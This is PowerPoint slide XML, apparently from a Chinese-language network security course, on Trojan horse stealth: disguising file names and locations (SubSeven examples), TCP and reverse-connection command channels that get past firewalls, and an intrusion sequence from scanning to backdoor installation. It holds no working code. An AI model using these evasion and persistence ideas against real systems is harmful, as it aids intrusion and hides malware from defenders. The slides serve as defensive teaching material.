        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载方式－修改文件关联</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94A8ED9E-E3D7-458B-9289-ACE75DC6EF89}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>264</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2999424034"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位置：存放位置及文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信：通信方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>活动：进程隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>特洛伊木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐蔽性</a:t>
            </a:r>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203B104-39C1-4ABC-AC18-FC21C71770DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>265</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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a:t>服务器（被控端）程序文件一般位置：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c:\windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c:\windows\system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一些系统文件在这两个位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件名尽量和系统文件接近，比如</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SubSeven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c:\windows\KERNEL16.DL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：木马服务器文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c:\windows\KERNEL32.DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：系统文件，删除系统瘫痪。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SubSeven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器文件名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c:\windows\window.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>， 少一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171010" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马存放位置及文件名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F867AAB7-D8EB-46C6-AD04-20ED6CE146A1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>266</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4062334825"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>位置：存放位置及文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通信：通信方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>活动：进程隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>特洛伊木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐蔽性</a:t>
            </a:r>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203B104-39C1-4ABC-AC18-FC21C71770DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>267</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2699547202"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议，服务端侦听，客户端连接。最简单、最早、最广泛使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用工具很容易发现在某一端口上侦听的进程，以及进程对应的可执行文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>客户端发起连接会被防火墙拦截。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙通常严进宽出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器通过代理上网电脑，没有独立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址(只有局域网的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址)，客户端找不到服务器。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马基本通信方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>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fld id="{D215DC69-25F1-4F51-8E59-9FDDC12DC832}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0"/>
              <a:pPr/>
              <a:t>268</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886242424"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>
</p:sld>
</file>

<file path=ppt/slides/slide2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内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="8229600" cy="2294236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>客户端：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在有固定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者域名第三方（如公共邮箱，个人主页）发布自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开端口监听，等待服务端连接；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务端：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定期获取客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，主动连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反向连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="灯片编号占位符 3"/>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fld id="{695C2CCA-05F9-4444-AFFC-7AB97CC08DD8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0"/>
              <a:pPr/>
              <a:t>269</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="3340968"/>
            <a:ext cx="6591300" cy="1600200"/>
            <a:chOff x="1295400" y="1981200"/>
            <a:chExt cx="6591300" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 4" descr="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2069232"/>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057400"/>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5715000" y="1981200"/>
              <a:ext cx="228600" cy="16002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2" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2514600" y="2514600"/>
              <a:ext cx="3200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8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4724400" y="2590800"/>
              <a:ext cx="91440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Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3184525" y="20542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b="1"/>
                <a:t>连接请求</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="5026297"/>
            <a:ext cx="6667500" cy="1643063"/>
            <a:chOff x="1295400" y="3962400"/>
            <a:chExt cx="6667500" cy="1643063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 10" descr="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40814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p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="4081463"/>
              <a:ext cx="228600" cy="15240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Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2590800" y="4614863"/>
              <a:ext cx="449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3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5868144" y="415766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b="1"/>
                <a:t>连接请求</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 14" descr="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41576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
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2422525" y="3962400"/>
              <a:ext cx="51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t>80</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461337" y="4509120"/>
            <a:ext cx="1038944" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="4481587"/>
            <a:ext cx="1263650" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4190667964"/>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3732" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2514600"/>
            <a:ext cx="685800" cy="1752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采用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713733" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="685800" cy="1828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选择</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>会用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713734" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2667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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>一定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713735" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2209800"/>
            <a:ext cx="685800" cy="2514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提</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>升</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>最</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713736" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2895600"/>
            <a:ext cx="685800" cy="1219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安装</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713737" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="2819400"/>
            <a:ext cx="21336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获取敏感信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>或者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>其他攻击目的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713738" name="AutoShape 10"/>
          <p:cNvSpPr>
